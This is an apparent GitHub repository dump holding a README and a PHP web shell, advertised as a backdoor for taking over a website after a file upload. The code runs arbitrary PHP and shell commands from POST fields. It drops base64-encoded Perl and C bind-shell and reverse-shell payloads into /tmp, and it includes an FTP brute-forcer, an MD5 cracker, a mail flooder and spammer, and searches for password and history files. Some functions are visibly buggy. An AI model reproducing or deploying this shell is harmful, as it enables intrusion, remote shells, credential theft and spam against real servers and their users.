├── README.md └── bheh_shell.php /README.md: -------------------------------------------------------------------------------- 1 | # bheh_php_shell 2 | Black Hat Ethical Hacking | PHP Backdoor Shell v1.0 3 | 4 | For Educational Purpose Only! 5 | 6 | By SaintDruG // for Black Hat | Ethical Hacking // www.blackhatethicalhacking.com 7 | 8 | A Custom PHP Web Shell, used for penetration testing. 9 | 10 | Purpose: When you gain access to a website, and you have the ability to upload files, uploading this file, and running it will give you a set of tools and capabilities to take over and escalate using post exploitation in a fast timely manner. 11 | 12 | # Screenshot: 13 | ![alt text](https://blackhatethicalhacking.com/Bheh_Wev_shell.png) 14 | 15 | # Black Hat Ethical Hacking 16 | 17 | ![alt text](https://avatars1.githubusercontent.com/u/13942386?s=460&v=4) 18 | -------------------------------------------------------------------------------- /bheh_shell.php: -------------------------------------------------------------------------------- 1 | alert('Your shell script was succefully deleted!')"; 25 | } 26 | 27 | 28 | function md5_brute($hash,$log,$dict) 29 | { 30 | ignore_user_abort(1); 31 | set_time_limit(0); 32 | 33 | $fl = fopen($dict, "r"); 34 | $fl = fopen($log, "w"); 35 | $count = 0; 36 | if(!$dict){ 37 | return "Fill 'dictionary_file' field!"; 38 | }if(!$log){ 39 | return "Fill 'log_file' field!"; 40 | }elseif(!strlen($hash) == 0){ 41 | return "Fill 'md5_hash' field!"; 42 | }else{ 43 | while(!$feof($dict)){ 44 | $pass = fgets($dict); 45 | $brute_hash = md5($pass); 46 | if($brute_hash == $hash){ 47 | fputs($log, "$hash:$pass\n---"); 48 | fclose($dict); 49 | fclose($log); 50 | exit; 51 | }else{ 52 | $count = $count + 1; 53 | fputs($log, "$count passwords was bruted..."); 54 | } 55 | } 56 | fputs($log, "$count passwords are failed!"); 57 | } 58 | fclose($dict); 59 | fclose($log); 60 | } 61 | 62 | function port_bind($port,$pass,$method) 63 | { 64 | $perl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS 65 | VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs 66 | JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV 67 | TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG 68 | lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK 69 | Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i 70 | Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N 71 | lIENPTk47DQpleGl0IDA7DQp9DQp9"; 72 | $c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS 73 | A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I 74 | GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt 75 | b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 76 | pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF 77 | NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK 78 | ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog 79 | ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 80 | 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 81 | 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 82 | 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu 83 | dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp 84 | lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; 85 | 86 | if($method=='Perl') 87 | { 88 | fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl)); 89 | fclose($i); 90 | ex(which("perl")." /tmp/shlbck ".$port." &"); 91 | unlink("/tmp/shlbck"); 92 | return ex('ps -aux | grep shlbck'); 93 | } 94 | elseif($method=='C#') 95 | { 96 | fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c)); 97 | fclose($i); 98 | ex("gcc shlbck.c -o shlbck"); 99 | unlink('shlbck.c'); 100 | ex("/tmp/shlbck ".$port." ".$pass." &"); 101 | unlink("/tmp/shlbck"); 102 | return ex('ps -aux | grep shlbck'); 103 | }else 104 | { 105 | return 'Choose method'; 106 | } 107 | 108 | } 109 | 110 | function backconnect($ip,$port,$method) 111 | { 112 | $perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 113 | aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 114 | hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 115 | sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 116 | kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 117 | KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 118 | OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 119 | 120 | $c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC 121 | BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb 122 | SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd 123 | KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ 124 | sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC 125 | Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D 126 | QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp 127 | Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; 128 | 129 | if($method=='Perl') 130 | { 131 | fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl)); 132 | fclose($i); 133 | ex(which("perl")." /tmp/shlbck ".$ip." ".$port." &"); 134 | unlink("/tmp/shlbck"); 135 | return ex('netstat -an | grep -i listen'); 136 | } 137 | elseif($method=='C#') 138 | { 139 | fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c)); 140 | fclose($i); 141 | ex("gcc shlbck.c -o shlbck"); 142 | unlink('shlbck.c'); 143 | ex("/tmp/shlbck ".$ip." ".$port." &"); 144 | unlink("/tmp/shlbck"); 145 | return ex('netstat -an | grep -i listen'); 146 | }else 147 | { 148 | return 'Choose method'; 149 | } 150 | } 151 | 152 | if($_POST['type']==11){download(stripslashes($_POST['value']));}; 153 | 154 | function download($dfilename) 155 | { 156 | $file=fopen($dfilename,"r"); 157 | ob_clean(); 158 | $filename = basename($dfilename); 159 | $filedump = fread($file,@filesize($dfilename)); 160 | fclose($file); 161 | header("Content-type: ".$mime_type); 162 | header("Content-disposition: attachment; filename=\"".$filename."\";"); 163 | echo $filedump; 164 | } 165 | 166 | function flooder($logf,$to,$from,$subject,$msg,$amount,$check) 167 | { 168 | ignore_user_abort(1); 169 | set_time_limit(0); 170 | 171 | $fl = fopen($logf, "w"); 172 | $count = 0; 173 | if(!$logf){ 174 | return "Fill 'log_file' field!"; 175 | }elseif(!$to){ 176 | return "Fill 'Send to' field!"; 177 | }elseif(!$from){ 178 | return "Fill 'From' field!"; 179 | }elseif(!$subject){ 180 | return "Fill 'Subject' field!"; 181 | }elseif(!$msg){ 182 | return "Fill 'Message' field!"; 183 | }elseif(!$amount){ 184 | return "Fill 'Amount' field!"; 185 | }else{ 186 | while($count < $amount){ 187 | mail("$to", "$subject", "$msg", "From: $from"); 188 | $count = $count + 1; 189 | $fl = fopen($logf, "w"); 190 | fputs($fl, "$count flood-letters was sended..."); 191 | fclose($fl); 192 | } 193 | if(strlen($check) != 0){ 194 | $check_text = "Done! $count flood-letters was sended!"; 195 | $check_sub = 'Check'; 196 | mail("$check", "$check_sub", "$check_text", "From: $from"); 197 | $fl = fopen($logf, "w"); 198 | fputs($fl, "Done! $count flood-letters was sended!"); 199 | } 200 | else{ 201 | $fl = fopen($logf, "w"); 202 | fputs($fl, "Done! $count flood-letters was sended!"); 203 | } 204 | } 205 | fclose($fl); 206 | } 207 | 208 | function ftp_brute($host,$ftp_users,$ftp_passwd,$ftp_log) 209 | { 210 | ignore_user_abort(1); 211 | set_time_limit(0); 212 | 213 | $fl = fopen($ftp_users, "r"); 214 | $fd = fopen($ftp_passwd, "r"); 215 | $fr = fopen($ftp_log, "a+"); 216 | if(!$host){ 217 | return "Fill 'Host' field!"; 218 | }elseif(!$ftp_users){ 219 | return "Fill 'ftp_users file' field!"; 220 | }elseif(!$ftp_passwd){ 221 | return "Fill 'ftp_passwd file' field!"; 222 | }elseif(!$ftp_log){ 223 | return "Fill 'ftp_log file' field!"; 224 | }elseif(!file_exists($ftp_users)){ 225 | return "File ".$ftp_users." doesn't exists!"; 226 | }elseif(!file_exists($ftp_passwd)){ 227 | return "File ".$ftp_passwd." doesn't exists!"; 228 | } 229 | else{ 230 | while(!feof($fd)){ 231 | $pass = fgets($fd); 232 | while(!feof($fl)){ 233 | $user = fgets($fl); 234 | $connect = ftp_connect($host); 235 | if(!$connect){ 236 | fputs($fr, "Enable connect to $host\n"); 237 | exit; 238 | }else{ 239 | $auth = ftp_login($connect, $user, $pass); 240 | if(!$auth){ 241 | ftp_quit($connect); 242 | } 243 | else{ 244 | fputs($fr, "$host:\n---$login:$pass\n---"); 245 | ftp_quit($connect); 246 | } 247 | } 248 | } 249 | } 250 | fputs($fr, "Done:\n"); 251 | fclose($fr); 252 | } 253 | fclose($fl); 254 | fclose($fd); 255 | } 256 | 257 | function spammer($from,$subject,$msg,$check,$elist,$logf) 258 | { 259 | ignore_user_abort(1); 260 | set_time_limit(0); 261 | 262 | $fp = fopen($elist. "r"); 263 | $fl = fopen($logf, "w"); 264 | $count = 0; 265 | if(!$from){ 266 | return "Fill 'From' field!"; 267 | }elseif(!$elist){ 268 | return "Fill 'Emails list' field!"; 269 | }elseif(!$logf){ 270 | return "Fill 'Log File' field!"; 271 | }elseif(!$msg){ 272 | return "Fill 'Message' field!"; 273 | }elseif(!$subject){ 274 | return "Fill 'Subject' field!"; 275 | }elseif(!file_exists($elist)){ 276 | return "File ".$elist." doesn't exists!"; 277 | }else{ 278 | while(!feof($fp)){ 279 | $to = fgets($fp); 280 | mail("$to", "$subject", "$msg", "From: $from"); 281 | $count = $count + 1; 282 | $fl = fopen($logf, "w"); 283 | fputs($fl, "$count letters was sent..."); 284 | fclose($fl); 285 | } 286 | if(strlen($check) != 0){ 287 | $check_text = "Done! $count letters was sent!"; 288 | $check_sub = 'Check'; 289 | mail("$check", "$check_sub", "$check_text", "From: $from"); 290 | $fl = fopen($logf, "w"); 291 | fputs($fl, "Done! $count letters was sent!\n"); 292 | } 293 | else{ 294 | $fl = fopen($logf, "w"); 295 | fputs($fl, "Done! $count letters was sent!"); 296 | } 297 | } 298 | fclose($fp); 299 | fclose($fl); 300 | } 301 | 302 | function alias($in) 303 | { 304 | if($in=="find apahce config file"){return ex('find / -type f -name httpd.conf');} 305 | elseif($in=="find access_log files"){return ex('find / -type f -name access_log');} 306 | elseif($in=="find error_log files"){return ex('find / -type f -name error_log');} 307 | elseif($in=="find suid files"){return ex('find / -type f -perm -04000 -ls');} 308 | elseif($in=="find suid files in current dir"){return ex('find . -type f -perm -04000 -ls');} 309 | elseif($in=="find sgid files"){return ex('find / -type f -perm -02000 -ls');} 310 | elseif($in=="find sgid files in current dir"){return ex('find . -type f -perm -02000 -ls');} 311 | elseif($in=="find config.inc.php files"){return ex('find / -type f -name config.inc.php');} 312 | elseif($in=="find config.inc.php files in current dir"){return ex('find . -type f -name config.inc.php');} 313 | elseif($in=="find config* files"){return ex('find / -type f -name "config*"');} 314 | elseif($in=="find config* files in current dir"){return ex('find . -type f -name "config*"');} 315 | elseif($in=="find all writable files"){return ex('find / -type f -perm -2 -ls');} 316 | elseif($in=="find all writable files in current dir"){return ex('find . -type f -perm -2 -ls');} 317 | elseif($in=="find all writable directories"){return ex('find / -type d -perm -2 -ls');} 318 | elseif($in=="find all writable directories in current dir"){return ex('find . -type d -perm -2 -ls');} 319 | elseif($in=="find all writable directories and files"){return ex('find / -perm -2 -ls');} 320 | elseif($in=="find all writable directories and files in current dir"){return ex('find . -perm -2 -ls');} 321 | elseif($in=="find all service.pwd files"){return ex('find / -type f -name service.pwd');} 322 | elseif($in=="find service.pwd files in current dir"){return ex('find . -type f -name service.pwd');} 323 | elseif($in=="find all .htpasswd files"){return ex('find / -type f -name .htpasswd');} 324 | elseif($in=="find .htpasswd files in current dir"){return ex('find . -type f -name .htpasswd');} 325 | elseif($in=="find all .bash_history files"){return ex('find / -type f -name .bash_history');} 326 | elseif($in=="find .bash_history files in current dir"){return ex('find . -type f -name .bash_history');} 327 | elseif($in=="find all .mysql_history files"){return ex('find / -type f -name .mysql_history');} 328 | elseif($in=="find .mysql_history files in current dir"){return ex('find . -type f -name .mysql_history');} 329 | elseif($in=="find all .fetchmailrc files"){return ex('find / -type f -name .fetchmailrc');} 330 | elseif($in=="find .fetchmailrc files in current dir"){return ex('find . -type f -name .fetchmailrc');} 331 | elseif($in=="list file attributes on a Linux second extended file system"){return ex('lsattr -va');} 332 | elseif($in=="show opened ports"){return ex('netstat -an | grep -i listen');} 333 | elseif($in=="---------------------------------------------------------------------------------------------------------"){return ex('ls -la');} 334 | } 335 | 336 | function testperl() 337 | { 338 | if(ex('perl -h')) 339 | { 340 | return "ON"; 341 | }else{ 342 | return "OFF"; 343 | } 344 | } 345 | 346 | function testlynx() 347 | { 348 | if(ex('lynx --help')) 349 | { 350 | return "ON"; 351 | }else{ 352 | return "OFF"; 353 | } 354 | } 355 | 356 | 357 | function view_size($size) 358 | { 359 | if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} 360 | elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} 361 | elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} 362 | else {$size = $size . " B";} 363 | return $size; 364 | } 365 | 366 | function testfetch() 367 | { 368 | if(ex('fetch --help')) 369 | { 370 | return "ON"; 371 | }else{ 372 | return "OFF"; 373 | } 374 | } 375 | 376 | function testwget() 377 | { 378 | if(ex('wget --help')) 379 | { 380 | return "ON"; 381 | }else{ 382 | return "OFF"; 383 | } 384 | } 385 | 386 | function oracle() 387 | { 388 | if(function_exists('ocilogon')) 389 | { 390 | return "ON"; 391 | }else{ 392 | return "OFF"; 393 | } 394 | } 395 | 396 | function postgresql() 397 | { 398 | if(function_exists('pg_connect')) 399 | { 400 | return "ON"; 401 | }else{ 402 | return "OFF"; 403 | } 404 | } 405 | 406 | function testmssql() 407 | { 408 | if(function_exists('mssql_connect')) 409 | { 410 | return "ON"; 411 | }else{ 412 | return "OFF"; 413 | } 414 | } 415 | function testcurl() 416 | { 417 | if(function_exists('curl_version')) 418 | { 419 | return "ON"; 420 | }else{ 421 | return "OFF"; 422 | } 423 | } 424 | function testmysql() 425 | { 426 | if(function_exists('mysql_connect')) 427 | { 428 | return "ON"; 429 | }else{ 430 | return "OFF"; 431 | } 432 | } 433 | function safe_mode() 434 | { 435 | if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3) 436 | { 437 | $_SESSION['safe_mode'] = 1; 438 | return "ON"; 439 | }else{ 440 | $_SESSION['safe_mode'] = 0; 441 | return "OFF"; 442 | } 443 | }; 444 | 445 | function ex($in) 446 | { 447 | $out = ''; 448 | 449 | 450 | if(function_exists('exec')) 451 | { 452 | exec($in,$out); 453 | $out = join("\n",$out); 454 | } 455 | elseif(function_exists('passthru')) 456 | { 457 | ob_start(); 458 | passthru($in); 459 | $out = ob_get_contents(); 460 | ob_end_clean(); 461 | } 462 | elseif(function_exists('system')) 463 | { 464 | ob_start(); 465 | system($in); 466 | $out = ob_get_contents(); 467 | ob_end_clean(); 468 | } 469 | elseif(function_exists('shell_exec')) 470 | { 471 | $out = shell_exec($in); 472 | } 473 | elseif(is_resource($f = popen($in,"r"))) 474 | { 475 | $out = ""; 476 | while(!@feof($f)) { $out .= fread($f,1024); } 477 | pclose($f); 478 | } 479 | return $out; 480 | } 481 | 482 | function shell() 483 | { 484 | if($_POST['type']==1) 485 | { 486 | eval(stripslashes($_POST['value'])); 487 | } 488 | elseif($_POST['type']==2) 489 | { 490 | pwd(); 491 | print_r(ex(stripslashes($_POST['value']))); 492 | } 493 | elseif($_POST['type']==3) 494 | { 495 | if($_SESSION['safe_mode'] == 1){ 496 | if(($u=safe_ex('ls -la'))!='') 497 | {return $u;}else{return safe_ex('dir');}; 498 | 499 | }else{ 500 | if(($u=ex('ls -la'))!='') 501 | {return $u;}else{return ex('dir');}; 502 | } 503 | } 504 | elseif($_POST['type']==4) 505 | { 506 | if(file_exists(stripslashes($_POST['value']))) 507 | { 508 | if($safe_mode!=1){ 509 | echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value'])))); 510 | }else{ 511 | echo htmlspecialchars(safe_read(stripslashes($_POST['value']))); 512 | }; 513 | $_SESSION['edit']=1; 514 | $_SESSION['filename'] = $_POST['value']; 515 | }else{ 516 | return 'File doesn\'t exists!'; 517 | } 518 | } 519 | elseif($_POST['type']==5) 520 | { 521 | fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value'])); 522 | } 523 | elseif($_POST['type']==6) 524 | { 525 | $uploaddir = pwd(); 526 | if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; 527 | move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); 528 | } 529 | elseif($_POST['type']==7) 530 | { 531 | echo alias($_POST['value']); 532 | } 533 | elseif($_POST['type']==8) 534 | { 535 | echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf'])); 536 | } 537 | elseif($_POST['type']==9) 538 | { 539 | echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log'])); 540 | } 541 | elseif($_POST['type']==10) 542 | { 543 | echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check'])); 544 | } 545 | elseif($_POST['type']==12) 546 | { 547 | echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method'])); 548 | } 549 | elseif($_POST['type']==13) 550 | { 551 | echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method'])); 552 | } 553 | elseif($_POST['type']==14) 554 | { 555 | echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict'])); 556 | } 557 | 558 | else 559 | {$u = ex('ls -la'); 560 | if($u == ''){return ex('dir');}else{return $u;}; 561 | } 562 | 563 | return null; 564 | }; 565 | 566 | function edit() 567 | { 568 | if ($_SESSION['edit'] == 1){ 569 | $_SESSION['edit']=0; 570 | return "
";}; 571 | } 572 | 573 | function getsystem() 574 | { 575 | return php_uname('s')." ".php_uname('r')." ".php_uname('v'); 576 | }; 577 | 578 | function getserver() 579 | { 580 | return getenv("SERVER_SOFTWARE"); 581 | }; 582 | 583 | 584 | function getuser() 585 | { 586 | $out = get_current_user(); 587 | if($out!="SYSTEM") 588 | { 589 | if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();}; 590 | } 591 | return $out; 592 | }; 593 | 594 | function pwd() 595 | { 596 | if($_POST['type']==3) 597 | { 598 | $_SESSION['pwd'] = stripslashes($_POST['value']); 599 | } 600 | chdir($_SESSION['pwd']); 601 | $cwd = getcwd(); 602 | if($u=strrpos($cwd,'/')) 603 | { 604 | if($u!=strlen($cwd)-1){ 605 | return $cwd.'/';} 606 | else{return $cwd;}; 607 | } 608 | elseif($u=strrpos($cwd,'\\')) 609 | { 610 | if($u!=strlen($cwd)-1){ 611 | return $cwd.'\\';} 612 | else{return $cwd;}; 613 | }; 614 | } 615 | 616 | function safe_ex($in) 617 | { 618 | if($in){ 619 | $d=dir('.'); 620 | 621 | while (false!==($file=$d->read())) 622 | { 623 | if ($file=="." || $file=="..") continue; 624 | @clearstatcache(); 625 | list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); 626 | if(!$unix){ 627 | echo date("d.m.Y H:i",$mtime)." "; 628 | if(@is_dir($file)) echo " "; else printf("% 7s ",$size); 629 | } 630 | else{ 631 | $owner = @posix_getpwuid($uid); 632 | $grgid = @posix_getgrgid($gid); 633 | echo $inode." "; 634 | echo perms(@fileperms($file)); 635 | printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); 636 | echo date("d.m.Y H:i ",$mtime); 637 | } 638 | echo "$file\n"; 639 | } 640 | $d->close(); 641 | } 642 | 643 | function safe_read($in) 644 | { 645 | echo ini_get("safe_mode"); 646 | echo ini_get("open_basedir"); 647 | include("/etc/passwd"); 648 | ini_restore("safe_mode"); 649 | ini_restore("open_basedir"); 650 | echo ini_get("safe_mode"); 651 | echo ini_get("open_basedir"); 652 | 653 | file_get_contents($in); 654 | } 655 | 656 | } 657 | ?> 658 | 659 | 660 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | .::Black Hat | Ethical Hacking | Special Webshell | Educational Purpose Only::. 671 | 672 | 680 | 691 | 692 | 693 |
694 | 852 | 1362 |
695 | 696 | 724 | 740 | 850 |
697 | 698 | 701 | 704 | 707 | 710 | 713 | 716 | 719 | 722 |
699 | System: 700 | 702 | 703 |
705 | Server: 706 | 708 | 709 |
711 | User: 712 | 714 | 715 |
717 | pwd: 718 | 720 | 45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?> 721 |
723 |
725 |
726 |
727 | 728 |
729 |
.::h0ld-up-team::.
web-shell
730 |
731 |
732 |
733 | 734 | 735 | 736 |
737 |
738 | 739 |
741 | 742 | 779 | 796 | 813 | 814 | 831 | 848 |
743 | 744 | 747 | 750 | 753 | 756 | 759 |
745 | PHP-version: 746 |
748 | MySQL: 749 |
751 | MSSQL: 752 |
754 | PostgreSQL: 755 |
757 | Oracle: 758 |
760 |
761 | 762 | 765 | 768 | 771 | 774 | 777 |
763 | 764 |
766 | 767 |
769 | 770 |
772 | 773 |
775 | 776 |
778 |
780 | 783 | 786 | 789 | 792 | 795 |
781 | Safe_mode: 782 |
784 | cURL: 785 |
787 | wget: 788 |
790 | fetch: 791 |
793 | lynx: 794 |
797 | 800 | 803 | 806 | 809 | 812 |
798 | 799 |
801 | 802 |
804 | 805 |
807 | 808 |
810 | 811 |
815 | 818 | 821 | 824 | 827 | 830 |
816 | Perl: 817 |
819 | Server time: 820 |
822 | Server date: 823 |
825 | Total space: 826 |
828 | Free space: 829 |
832 | 835 | 838 | 841 | 844 | 847 |
833 | 834 |
836 | 837 |
839 | 840 |
842 | 843 |
845 | 846 |
849 |
851 |
853 | 854 | 1360 |
855 | 856 | 863 | 864 | 865 | 866 | 890 |
857 |
858 | 859 |
862 |
867 | 868 | 874 | 888 |
869 | .::System shell::.
870 | 871 |
872 |
873 |
875 |
876 | 877 | 883 | 886 |
878 | .::PHP-code::. 879 | 880 | 881 | 882 |
884 | 885 |
887 |
889 |
891 | 892 | 893 |
894 | 895 | 921 | 993 | 1108 | 1128 | 1129 |
896 |
897 | 898 | 904 | 907 |
899 | .::PWD::. 900 | 901 | 902 | 903 |
905 | > 906 |
908 |
909 | 910 | 916 | 919 |
911 | .::File Edit::. 912 | 913 | 914 | 915 |
917 | > 918 |
920 |
922 |
923 | 924 | 930 | 933 |
925 | .::Download::. 926 | 927 | 928 | 929 |
931 | > 932 |
934 |
935 | 936 | 942 | 948 |
937 | .::Upload::. 938 | 939 | 940 | 941 |
943 | New name: 944 | 945 | 946 | 947 |
949 |
950 |
951 | 952 | 958 | 992 |
953 | .::Alias::. 954 | 955 | 956 | 957 |
959 | 991 |
1109 |
1110 | 1111 | 1116 | 1121 | 1126 |
1112 | .::Base64_encode::. 1113 | 1114 | 1115 | 1117 | .::Base64_decode::. 1118 | 1119 | 1120 |
1122 | 1123 | 1124 | 1125 |
1127 |
1130 |
1131 |
1132 | 1133 | 1163 |
1134 |
1135 | 1137 | 1138 | 1139 | 1140 | 1142 | 1143 | 1144 | 1145 | 1147 | 1148 | 1149 | 1150 | 1156 | 1157 | 1161 |
1136 | .::Back Connect::.
IP: 1141 | >
port: 1146 |
Method: 1151 |
1158 | 1159 | 1160 |
1162 |
1164 |
1165 | 1166 | 1196 |
1167 |
1168 | 1170 | 1171 | 1172 | 1173 | 1175 | 1176 | 1177 | 1178 | 1180 | 1181 | 1182 | 1183 | 1189 | 1190 | 1194 |
1169 | .::Bind port::.
Port: 1174 |
pass: 1179 |
Method: 1184 |
1191 | 1192 | 1193 |
1195 |
1197 |
1198 |
1199 | 1202 | 1206 | 1207 | 1211 | 1212 | 1216 | 1217 | 1221 |
1200 | .::md5 bruter::. 1201 |
